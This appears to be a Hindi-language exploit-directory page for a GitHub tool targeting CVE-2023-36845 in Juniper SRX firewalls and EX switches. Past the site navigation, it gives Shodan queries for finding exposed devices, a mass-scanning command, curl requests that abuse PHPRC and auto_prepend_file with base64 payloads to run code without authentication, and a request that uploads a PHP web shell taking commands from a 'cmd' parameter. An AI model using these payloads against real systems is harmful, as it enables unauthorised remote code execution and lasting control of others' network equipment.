Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Juniper-exploit-CVE-2023-36845 — CVE-2023-36845 के लिए एक्सप्लॉइट, Juniper SRX/EX में PHP पर्यावरण चर हेरफेर भेद्यता, क्राफ्टेड HTTP अनुरोधों के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/charondefalt/juniper-exploit-cve-2023-36845
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubcharondefalt/juniper-exploit-cve-2023-36845

Juniper-exploit-CVE-2023-36845

CVE-2023-36845 के लिए एक्सप्लॉइट, Juniper SRX/EX में PHP पर्यावरण चर हेरफेर भेद्यता, क्राफ्टेड HTTP अनुरोधों के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन सक्षम करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
42 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-36845

विवरण

CVE-2023-36845 एक महत्वपूर्ण PHP पर्यावरण चर हेरफेर भेद्यता है जो Juniper SRX फायरवॉल और EX स्विच को प्रभावित करती है। जबकि Juniper ने इस भेद्यता को मध्यम गंभीरता की श्रेणी में रखा है, इस लेख में हम यह समझाएँगे कि इस एकल भेद्यता का उपयोग दूरस्थ, अप्रमाणित कोड निष्पादन के लिए कैसे किया जा सकता है।

खोज - Shodan

title:"Juniper Web Device Manager"
छवि
title:"Juniper" http.favicon.hash:2141724739
छवि

उपयोग 🛠

पता लगाना

python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

विकल्प 1

auto_prepend_file के साथ किसी भी प्रोटोकॉल रैपर का उपयोग करना संभव है। इस ऑपरेशन के लिए सबसे उपयुक्त विकल्प data:// प्रोटोकॉल है, जो "द्वितीयक फ़ाइल" को इनलाइन प्रदान करने की अनुमति देता है। यहाँ इस एक्सप्लॉइट का एक उन्नत प्रतिनिधित्व है, जो data:// स्कीम के भीतर एम्बेडेड <? phpinfo(); ?> को निष्पादित करता है:

curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

whoami कमांड निष्पादित करें

<?php shell_exec('whoami'); ?>

curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

विकल्प 2

फ़ाइल अपलोड करें

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

पैरामीटर 🧰

पैरामीटरविवरणप्रकार
--file / -fइनपुट लक्ष्य फ़ाइलफ़ाइल
-oआउटपुट फ़ाइलफ़ाइल
टूल डाउनलोड करें